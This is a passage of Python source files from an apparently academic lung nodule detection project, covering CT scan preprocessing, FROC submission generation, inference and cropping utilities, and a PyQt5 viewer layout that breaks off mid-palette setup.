pad_value * (1 - binary_mask_dilated).astype('uint8')
# set bone-like voxels (uint8 value above bone_thred) in the extra
# (dilated minus original) mask back to pad_value, i.e. water density.
if remove_bone:
image_new[image_new * binary_mask_extra > bone_thred] = pad_value
return image_new
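# Minimal usage sketch (assuming a lung mask in which label 1 and label 2 mark
# the two lungs, as produced by the segmentation step used in this repo):
# img_u8 = lumTrans(raw_hu_volume)
# masked = apply_mask(img_u8, lung_mask == 1, lung_mask == 2)
# This mirrors the calls made in savenpy_luna_attribute below.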
def savenpy_luna_attribute(params_lists):
inputpath, savepath, maskpath = params_lists
print("Save %s to numpy"%inputpath)
islabel = True
isClean = True
resolution = np.array([1, 1, 1])
sliceim, origin, spacing = load_itk_image(inputpath)
lung_mask, _, _ = load_itk_image(maskpath)
np.save(savepath + '_origin.npy', origin)
np.save(savepath + '_spacing.npy', spacing)
binary_mask1, binary_mask2 = lung_mask == 1, lung_mask == 2
binary_mask = binary_mask1 + binary_mask2
ori_sliceim_shape_yx = sliceim.shape[1:3]
sliceim = lumTrans(sliceim)
sliceim = apply_mask(sliceim, binary_mask1, binary_mask2)
sliceim1, _ = resample(sliceim, spacing, resolution, order=1)
seg_img = sliceim1
"""
lung_box = get_lung_box(binary_mask, seg_img.shape)
z_min, z_max = lung_box[0]
y_min, y_max = lung_box[1]
x_min, x_max = lung_box[2]
seg_img = seg_img[z_min:z_max, y_min:y_max, x_min:x_max]
#sliceim = sliceim1[np.newaxis, ...]
"""
np.save(savepath + '_clean.npy', seg_img)
#nrrd.write(savepath + '_clean.nrrd', seg_img)
return 1
def main():
img_dir = config["img_dir"]
data_txt = config["data_txt"]
lung_mask_dir = config["lung_mask_dir"]
npy_dir = config["npy_dir"]
mhd_dir = config['mhd_dir']
if not os.path.exists(lung_mask_dir):
os.makedirs(lung_mask_dir)
if not os.path.exists(npy_dir):
os.makedirs(npy_dir)
if not os.path.exists(mhd_dir):
os.makedirs(mhd_dir)
with open(data_txt, "r") as f:
lines = f.readlines()
record_series = []
record = []
params_lists = []
for line in lines:
line = line.rstrip()
savedir = '_'.join(line.split("/"))
params_lists.append(line)
pool = Pool(processes=10)
result = pool.map(load_itk_series, params_lists)
for item in result:
record_series.append(item)
pool.close()
pool.join()
print(record_series)
with open("record_folder_series.txt",'w') as f:
f.write('\n'.join(record_series))
record_name = []
for line in record_series:
line = line.rstrip()
line = line.split(' ')
for i in range(1, len(line)):
record_name.append(line[i])
with open("record_series_list.txt",'w') as f:
f.write('\n'.join(record_name))
for line in record_name:
print("lung segmentation:", line)
line = line.rstrip()
savedir = line
get_lung_mhd(os.path.join(mhd_dir, line+'.mhd'), os.path.join(lung_mask_dir, line))
params_lists = []
for line in record_name:
print(line)
line = line.rstrip()
savename = line
npy_savepath = os.path.join(npy_dir, savename)
mask_savepath = os.path.join(lung_mask_dir, savename+'.mhd')
params_lists.append([os.path.join(mhd_dir, line+'.mhd'), npy_savepath, mask_savepath])
pool = Pool(processes=10)
pool.map(savenpy_luna_attribute, params_lists)
pool.close()
pool.join()
if __name__=='__main__':
main()
```
#### File: JiazeWang/lung_nodule_detector/make_FROC_submit_native.py
```python
import numpy as np
import sys
sys.path.append('../')
from training.layers import nms, iou, acc
import time
import multiprocessing as mp
import math
import SimpleITK as sitk
import os
from config_training import config
import pandas
import csv
import io
save_dir = 'results/res18_split_focal/bbox/'
submit_file = './luna_submission_res18_split_classify.csv'
sid = './val9_sid.csv'
val_num = np.load('val9.npy')
luna_data = config['luna_data']
luna_label = './labels/lunaqualified_all.csv'
shorter_label = './labels/shorter.csv'
resolution = np.array([1,1,1])
annos = np.array(pandas.read_csv(luna_label))
abbrevs = np.array(pandas.read_csv(shorter_label, header=None))
namelist = abbrevs[:, 1]
ids = list(abbrevs[:, 0])
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def load_itk_image(filename):
with open(filename) as f:
contents = f.readlines()
line = [k for k in contents if k.startswith('TransformMatrix')][0]
transformM = np.array(line.split(' = ')[1].split(' ')).astype('float')
transformM = np.round(transformM)
if np.any( transformM!=np.array([1,0,0, 0, 1, 0, 0, 0, 1])):
isflip = True
else:
isflip = False
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing, isflip
def convert_worldcoord(idx, pbb, filename_dict):
sliceim, origin, spacing, isflip = load_itk_image(os.path.join(luna_data, filename_dict[idx] + '.mhd'))
#Mask, extendbox = Mask_info(idx, filename_dict)
ori_sliceim_shape_yx = sliceim.shape[1:3]
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
pos_ori = pos_ori * resolution / spacing
if isflip:
pos_ori[1:] = ori_sliceim_shape_yx - pos_ori[1:]
pos_ori[1] = pos_ori[1] * -1
pos_ori[2] = pos_ori[2] * -1
pos_ori = pos_ori * spacing
pos_ori = pos_ori + origin
pos_ori = pos_ori[::-1]
radious_ori = radious_ori / spacing[1] * resolution[1]
radious_ori = radious_ori * spacing[1]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
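# Shape/unit walk-through: each pbb row is [confidence, z, y, x, size] in the
# resampled 1 mm grid. The position is rescaled to original voxel indices
# (pos * resolution / spacing), optionally flipped, converted back to mm
# (pos * spacing), shifted by the scan origin, and finally reversed so the
# output order matches the (x, y, z) columns written to the submission CSV
# below. The raw confidence in column 0 is squashed through a sigmoid.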
def duplicate_file(in_filename):
out_filename = in_filename + '.bin'
# Copy the file byte-for-byte; binary mode keeps this correct under Python 3.
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(infile.read())
if __name__ == '__main__':
pbb = []
lbb = []
filename_dict = {}
csv_submit = []
csv_sid = []
print ("datadir", luna_data)
for i in range(len(val_num)):
pbb_item = np.load(save_dir + str(val_num[i]) + '_pbb.npy')
lbb_item = np.load(save_dir + str(val_num[i]) + '_lbb.npy')
filename_dict[i] = str(val_num[i])
pbb_item = pbb_item[pbb_item[:, 0].argsort()[::-1]]
pbb_append_list = []
for item in pbb_item:
# keep only candidates with nodule probability > 0.1
if sigmoid(item[0]) < 0.1:
continue
#check overlap under 3mm
is_overlap = False
for appended in pbb_append_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[0] - item[0], 2) + math.pow(appended[1] - item[1], 2) + math.pow(
appended[2] - item[2], 2))
if (dist < minimum_dist):
is_overlap = True
break
if not is_overlap:
pbb_append_list.append(item)
pbb.append(np.array(pbb_append_list))
lbb.append(lbb_item)
pbb = np.array(pbb)
lbb = np.array(lbb)
conf_th = 0.1
nms_th = 0.3
detect_th = 0.3
for i in range(len(pbb)):
nms_pbb = nms(pbb[i], nms_th)
world_pbb = convert_worldcoord(i, nms_pbb, filename_dict)
print (filename_dict[i])
s_id = namelist[ids.index(int(filename_dict[i]))]
#csv_sid.append([s_id.encode()])
csv_sid.append([s_id])
for candidate in world_pbb:
csv_submit.append([s_id, candidate[1], candidate[2], candidate[3], candidate[0]])
df_annos = pandas.DataFrame(csv_submit, columns=["seriesuid", "coordX", "coordY", "coordZ", "probability"])
df_annos.to_csv(submit_file, index=False)
df_annos = pandas.DataFrame(csv_sid)
df_annos.to_csv(sid, index=False, header=False)
``` |
{
"source": "JiazeWang/lung_nodule_integ_viewer",
"score": 2
} |
#### File: JiazeWang/lung_nodule_integ_viewer/UI_util.py
```python
import SimpleITK as sitk
import numpy as np
import torch
import math
import time
import sys
import cv2
from scipy.ndimage.interpolation import zoom
from torch.autograd import Variable
sys.path.append('../lung_nodule_detector')
from training.layers import nms
def load_itk_image(filename):
with open(filename) as f:
contents = f.readlines()
line = [k for k in contents if k.startswith('TransformMatrix')][0]
transformM = np.array(line.split(' = ')[1].split(' ')).astype('float')
transformM = np.round(transformM)
if np.any(transformM != np.array([1, 0, 0, 0, 1, 0, 0, 0, 1])):
isflip = True
else:
isflip = False
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing, isflip
def lumTrans(img):
lungwin = np.array([-1200.,600.])
newimg = (img-lungwin[0])/(lungwin[1]-lungwin[0])
newimg[newimg<0]=0
newimg[newimg>1]=1
newimg = (newimg*255).astype('uint8')
return newimg
def resample(imgs, spacing, new_spacing, progressBar, order=2):
print (len(imgs.shape))
if len(imgs.shape)==3:
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = zoom(imgs, resize_factor, mode = 'nearest',order=order)
progressBar.setValue(40)
return imgs, true_spacing
elif len(imgs.shape)==4:
n = imgs.shape[-1]
newimg = []
for i in range(n):
slice = imgs[:,:,:,i]
newslice, true_spacing = resample(slice, spacing, new_spacing, progressBar, order=order)
newimg.append(newslice)
newimg=np.transpose(np.array(newimg),[1,2,3,0])
return newimg,true_spacing
else:
raise ValueError('wrong shape')
def resample_v1(imgs, spacing, new_spacing, order=2):
print (len(imgs.shape))
if len(imgs.shape)==3:
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = zoom(imgs, resize_factor, mode = 'nearest',order=order)
return imgs, true_spacing
elif len(imgs.shape)==4:
n = imgs.shape[-1]
newimg = []
for i in range(n):
slice = imgs[:,:,:,i]
newslice, true_spacing = resample_v1(slice, spacing, new_spacing, order=order)
newimg.append(newslice)
newimg=np.transpose(np.array(newimg),[1,2,3,0])
return newimg,true_spacing
else:
raise ValueError('wrong shape')
def split_data(data, stride, split_comber):
print (data.shape[1:])
nz, nh, nw = data.shape[1:]
pz = int(np.ceil(float(nz) / stride)) * stride
ph = int(np.ceil(float(nh) / stride)) * stride
pw = int(np.ceil(float(nw) / stride)) * stride
data = np.pad(data, [[0, 0], [0, pz - nz], [0, ph - nh], [0, pw - nw]], 'constant', constant_values=0)
xx, yy, zz = np.meshgrid(np.linspace(-0.5, 0.5, int(data.shape[1] / stride)),
np.linspace(-0.5, 0.5, int(data.shape[2] / stride)),
np.linspace(-0.5, 0.5, int(data.shape[3] / stride)), indexing='ij')
coord = np.concatenate([xx[np.newaxis, ...], yy[np.newaxis, ...], zz[np.newaxis, :]], 0).astype('float32')
data, nzhw = split_comber.split(data)
coord2, nzhw2 = split_comber.split(coord,
side_len=int(split_comber.side_len / stride),
max_stride=int(split_comber.max_stride / stride),
margin=int(split_comber.margin / stride))
assert np.all(nzhw == nzhw2)
data = (data.astype(np.float32) - 128) / 128
return torch.from_numpy(data), torch.from_numpy(coord2), np.array(nzhw)
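# Padding example (illustrative sizes): with stride = 4 and an input of
# nz, nh, nw = 103, 320, 320, the volume is zero-padded to 104 x 320 x 320 so
# that every side is a multiple of stride, and the normalized coordinate grid
# has spatial shape (26, 80, 80). split_comber then cuts both the data and the
# coordinate grid into overlapping patches for patch-wise inference.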
def convert_prob(pbb):
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def predict_nodule(net, data, coord, nzhw, lbb, n_per_run, split_comber, get_pbb, progressBar):
net.eval()
total_label = 0
total_candi = 0
splitlist = list(range(0, len(data) + 1, n_per_run))
if splitlist[-1] != len(data):
splitlist.append(len(data))
outputlist = []
for i in range(len(splitlist) - 1):
with torch.no_grad():
inputdata = Variable(data[splitlist[i]:splitlist[i + 1]]).cuda()
inputcoord = Variable(coord[splitlist[i]:splitlist[i + 1]]).cuda()
output = net(inputdata, inputcoord)
outputlist.append(output.data.cpu().numpy())
progressBar.setValue(10 + (80/len(splitlist) * (i+1)))
output = np.concatenate(outputlist, 0)
output = split_comber.combine(output, nzhw=nzhw)
# fps 1.215909091, sens 0.933333333, thres 0.371853054
thresh = 0.371853054
pbb, mask = get_pbb(output, thresh, ismask=True)
pbb = pbb[pbb[:, 0].argsort()[::-1]]
pbb_cand_list = []
# check overlap under 3mm
for cand in pbb:
is_overlap = False
for appended in pbb_cand_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[1] - cand[1], 2) + math.pow(appended[2] - cand[2], 2) + math.pow(
appended[3] - cand[3], 2))
if (dist < minimum_dist):
is_overlap = True
break
if not is_overlap:
pbb_cand_list.append(cand)
pbb_cand_list = np.array(pbb_cand_list)
pbb_cand_list_nms = nms(pbb_cand_list, 0.3)
# print (name)
# print (lbb)
world_pbb = convert_prob(pbb_cand_list_nms)
# print (world_pbb)
print("label", len(lbb))
print("z_pos y_pos x_pos size")
for i in range(len(lbb)):
for j in range(len(lbb[i])):
print(round(lbb[i][j], 2), end='\t')
print()
print("candidate", len(world_pbb))
print("prob z_pos y_pos x_pos size")
for i in range(len(world_pbb)):
for j in range(len(world_pbb[i])):
print(round(world_pbb[i][j], 2), end='\t')
print()
total_label += len(lbb)
total_candi += len(world_pbb)
return lbb, world_pbb
def predict_nodule_v1(net, data, coord, nzhw, lbb, n_per_run, split_comber, get_pbb):
net.eval()
total_label = 0
total_candi = 0
splitlist = list(range(0, len(data) + 1, n_per_run))
if splitlist[-1] != len(data):
splitlist.append(len(data))
outputlist = []
for i in range(len(splitlist) - 1):
with torch.no_grad():
inputdata = Variable(data[splitlist[i]:splitlist[i + 1]]).cuda()
inputcoord = Variable(coord[splitlist[i]:splitlist[i + 1]]).cuda()
output = net(inputdata, inputcoord)
outputlist.append(output.data.cpu().numpy())
output = np.concatenate(outputlist, 0)
output = split_comber.combine(output, nzhw=nzhw)
# fps 1.215909091, sens 0.933333333, thres 0.371853054
thresh = 0.371853054
pbb, mask = get_pbb(output, thresh, ismask=True)
pbb = pbb[pbb[:, 0].argsort()[::-1]]
pbb_cand_list = []
# check overlap under 3mm
for cand in pbb:
is_overlap = False
for appended in pbb_cand_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[1] - cand[1], 2) + math.pow(appended[2] - cand[2], 2) + math.pow(
appended[3] - cand[3], 2))
if (dist < minimum_dist):
is_overlap = True
break
if not is_overlap:
pbb_cand_list.append(cand)
pbb_cand_list = np.array(pbb_cand_list)
pbb_cand_list_nms = nms(pbb_cand_list, 0.3)
# print (name)
# print (lbb)
world_pbb = convert_prob(pbb_cand_list_nms)
# print (world_pbb)
print("label", len(lbb))
print("z_pos y_pos x_pos size")
for i in range(len(lbb)):
for j in range(len(lbb[i])):
print(round(lbb[i][j], 2), end='\t')
print()
print("candidate", len(world_pbb))
print("prob z_pos y_pos x_pos size")
for i in range(len(world_pbb)):
for j in range(len(world_pbb[i])):
print(round(world_pbb[i][j], 2), end='\t')
print()
total_label += len(lbb)
total_candi += len(world_pbb)
return lbb, world_pbb
def draw_nodule_rect(lbb, world_pbb, img_arr):
for i in range(len(lbb)):
label = lbb[i]
# label = np.ceil(label)
r = (label[3] / 2) * 1.3
top_left = (max(int(math.ceil(label[2] - r)), 0),
max(int(math.ceil(label[1] - r)), 0))
bottom_right = (min(int(math.ceil(label[2] + r)), np.shape(img_arr)[1]),
min(int(math.ceil(label[1] + r)), np.shape(img_arr)[2]))
z_range = [max(int(math.ceil(label[0] - r)), 0),
min(int(math.ceil(label[0] + r)), np.shape(img_arr)[0])]
for j in range(z_range[0], z_range[1]):
cv2.rectangle(img_arr[j], top_left, bottom_right, (0, 255, 0), 1)
for i in range(len(world_pbb)):
candidate = world_pbb[i]
r = (candidate[4] / 2) * 1.3
top_left = (max(int(math.ceil(candidate[3] - r)), 0),
max(int(math.ceil(candidate[2] - r)), 0))
text_top_left = (max(int(math.ceil(candidate[3] - r)) - 1, 0),
max(int(math.ceil(candidate[2] - r)) - 1, 0))
bottom_right = (min(int(math.ceil(candidate[3] + r)), np.shape(img_arr)[1]),
min(int(math.ceil(candidate[2] + r)), np.shape(img_arr)[2]))
z_range = [max(int(math.ceil(candidate[1] - r)), 0),
min(int(math.ceil(candidate[1] + r)), np.shape(img_arr)[0])]
font = cv2.FONT_HERSHEY_SIMPLEX
for j in range(z_range[0], z_range[1]):
cv2.rectangle(img_arr[j], top_left, bottom_right, (255, 0, 0), 1)
#cv2.putText(img_arr[j], "c" + str(i) + "_" +str(round(candidate[0], 2)), top_left, font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
cv2.putText(img_arr[j], "c" + str(i), text_top_left, font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
def crop_all(target, img_arr, crop_size = 48):
target = np.copy(target)
start = []
for i in range(3):
start.append(int(round(target[i])) - int(crop_size / 2))
pad = []
pad.append([0, 0])
for i in range(3):
leftpad = max(0, -start[i])
rightpad = max(0, start[i] + crop_size - img_arr.shape[i + 1])
pad.append([leftpad, rightpad])
crop = img_arr[:,
max(start[0], 0):min(start[0] + crop_size, img_arr.shape[1]),
max(start[1], 0):min(start[1] + crop_size, img_arr.shape[2]),
max(start[2], 0):min(start[2] + crop_size, img_arr.shape[3])]
crop = np.pad(crop, pad, 'constant', constant_values=0)
for i in range(3):
target[i] = target[i] - start[i]
return crop, target
def crop_nodule_arr_2ch(target, img_arr, crop_size = 48):
img_size = [crop_size, crop_size, crop_size]
crop_img, target = crop_all(target, img_arr, crop_size)
imgs = np.squeeze(crop_img, axis=0)
z = int(target[0])
y = int(target[1])
x = int(target[2])
print (z, y, x)
# z = 24
# y = 24
# x = 24
nodule_size = int(target[3])
margin = max(7, nodule_size * 0.4)
radius = int((nodule_size + margin) / 2)
s_z_pad = 0
e_z_pad = 0
s_y_pad = 0
e_y_pad = 0
s_x_pad = 0
e_x_pad = 0
s_z = max(0, z - radius)
if (s_z == 0):
s_z_pad = -(z - radius)
e_z = min(np.shape(imgs)[0], z + radius)
if (e_z == np.shape(imgs)[0]):
e_z_pad = (z + radius) - np.shape(imgs)[0]
s_y = max(0, y - radius)
if (s_y == 0):
s_y_pad = -(y - radius)
e_y = min(np.shape(imgs)[1], y + radius)
if (e_y == np.shape(imgs)[1]):
e_y_pad = (y + radius) - np.shape(imgs)[1]
s_x = max(0, x - radius)
if (s_x == 0):
s_x_pad = -(x - radius)
e_x = min(np.shape(imgs)[2], x + radius)
if (e_x == np.shape(imgs)[2]):
e_x_pad = (x + radius) - np.shape(imgs)[2]
# print (s_x, e_x, s_y, e_y, s_z, e_z)
# print (np.shape(img_arr[s_z:e_z, s_y:e_y, s_x:e_x]))
nodule_img = imgs[s_z:e_z, s_y:e_y, s_x:e_x]
nodule_img = np.pad(nodule_img, [[s_z_pad, e_z_pad], [s_y_pad, e_y_pad], [s_x_pad, e_x_pad]], 'constant',
constant_values=0)
imgpad_size = [img_size[0] - np.shape(nodule_img)[0],
img_size[1] - np.shape(nodule_img)[1],
img_size[2] - np.shape(nodule_img)[2]]
imgpad = []
imgpad_left = [int(imgpad_size[0] / 2),
int(imgpad_size[1] / 2),
int(imgpad_size[2] / 2)]
imgpad_right = [int(imgpad_size[0] / 2),
int(imgpad_size[1] / 2),
int(imgpad_size[2] / 2)]
for i in range(3):
if (imgpad_size[i] % 2 != 0):
rand = np.random.randint(2)
if rand == 0:
imgpad.append([imgpad_left[i], imgpad_right[i] + 1])
else:
imgpad.append([imgpad_left[i] + 1, imgpad_right[i]])
else:
imgpad.append([imgpad_left[i], imgpad_right[i]])
padding_crop = np.pad(nodule_img, imgpad, 'constant', constant_values=0)
padding_crop = np.expand_dims(padding_crop, axis=0)
crop = np.concatenate((padding_crop, crop_img))
crop = (crop.astype(np.float32) - 128) / 128
return torch.from_numpy(crop), crop
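# The returned crop has two channels: channel 0 is a nodule-sized patch
# (nodule diameter plus a margin of max(7, 0.4 * diameter) voxels) zero-padded
# and centered in a crop_size^3 volume, and channel 1 is the full crop_size^3
# context patch around the same center. Both are normalized to roughly [-1, 1]
# via (x - 128) / 128 before being fed to the attribute network.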
def predict_attribute(attribute_net, crop_img):
attribute_net.eval()
with torch.no_grad():
crop_img = Variable(crop_img.cuda(non_blocking=True))
output = attribute_net(crop_img)
return output
```
#### File: JiazeWang/lung_nodule_integ_viewer/xai_viewer_ui.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_xai_viewer(object):
def setupUi(self, xai_viewer):
xai_viewer.setObjectName("xai_viewer")
xai_viewer.resize(1240, 1200)
self.centralwidget = QtWidgets.QWidget(xai_viewer)
self.centralwidget.setObjectName("centralwidget")
self.prev_button = QtWidgets.QPushButton(self.centralwidget)
self.prev_button.setGeometry(QtCore.QRect(298, 578, 80, 22))
self.prev_button.setObjectName("prev_button")
self.next_button = QtWidgets.QPushButton(self.centralwidget)
self.next_button.setGeometry(QtCore.QRect(382, 578, 80, 22))
self.next_button.setObjectName("next_button")
self.listView = QtWidgets.QListView(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(109, 50, 171, 491))
self.listView.setObjectName("listView")
self.horizontalScrollBar = QtWidgets.QScrollBar(self.centralwidget)
self.horizontalScrollBar.setGeometry(QtCore.QRect(299, 550, 801, 16))
self.horizontalScrollBar.setOrientation(QtCore.Qt.Horizontal)
self.horizontalScrollBar.setObjectName("horizontalScrollBar")
self.slide_view_label = QtWidgets.QLabel(self.centralwidget)
self.slide_view_label.setGeometry(QtCore.QRect(979, 30, 121, 16))
self.slide_view_label.setObjectName("slide_view_label")
self.nodule_list_label = QtWidgets.QLabel(self.centralwidget)
self.nodule_list_label.setGeometry(QtCore.QRect(111, 30, 81, 16))
self.nodule_list_label.setObjectName("nodule_list_label")
self.file_name = QtWidgets.QLabel(self.centralwidget)
self.file_name.setGeometry(QtCore.QRect(299, 30, 481, 16))
self.file_name.setObjectName("file_name")
self.nodule_attribute_label = QtWidgets.QLabel(self.centralwidget)
self.nodule_attribute_label.setGeometry(QtCore.QRect(10, 610, 111, 16))
self.nodule_attribute_label.setObjectName("nodule_attribute_label")
self.detect_button = QtWidgets.QPushButton(self.centralwidget)
self.detect_button.setGeometry(QtCore.QRect(467, 578, 80, 22))
self.detect_button.setObjectName("detect_button")
self.detect_progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.detect_progressBar.setGeometry(QtCore.QRect(733, 574, 118, 23))
self.detect_progressBar.setProperty("value", 24)
self.detect_progressBar.setObjectName("detect_progressBar")
self.slide_show_label = QtWidgets.QLabel(self.centralwidget)
self.slide_show_label.setGeometry(QtCore.QRect(309, 53, 791, 481))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
